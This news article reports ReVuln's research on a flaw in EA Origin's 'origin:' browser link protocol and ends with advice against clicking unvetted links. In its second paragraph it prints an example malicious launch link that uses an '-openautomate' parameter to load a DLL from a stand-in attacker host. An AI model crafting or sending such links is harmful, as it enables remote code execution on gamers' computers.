A security flaw has surfaced in the browser protocol Origin uses to launch games through custom links using the "origin:" structure. As Ars Technica (opens in new tab) reports, research group ReVuln demonstrates how a malicious program can be executed via a modified Origin link masquerading as a game launch.
Normally, an Origin game calls for a "origin://LaunchGame/[GameID]" command when launching through a browser. According to ReVuln, attackers can simply modify this path to something like "origin://LaunchGame/[GameID]?CommandParams= -openautomate ATTACKER_IPevil.dll" to toxify the command, causing it to run a foreign DLL.
In addition to a paper (opens in new tab) on its findings, ReVuln also recorded a brief video of the exploit in action.
Responding to Ars, an EA rep said, "Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure."
The issue isn't exclusive to Origin—other programs using this kind of protocol are vulnerable, including Steam, which the same group demonstrated attacks on in October (opens in new tab) .
The problem is in the same family as any other phishing attack launched from malformed links or trojan email attachments. In the end, the safest course is to never click on un-vetted links containing funky-looking parameters, be it an Origin launch or otherwise. Or, in the words of Dr. Breen: "Be wise. Be safe. Be aware."
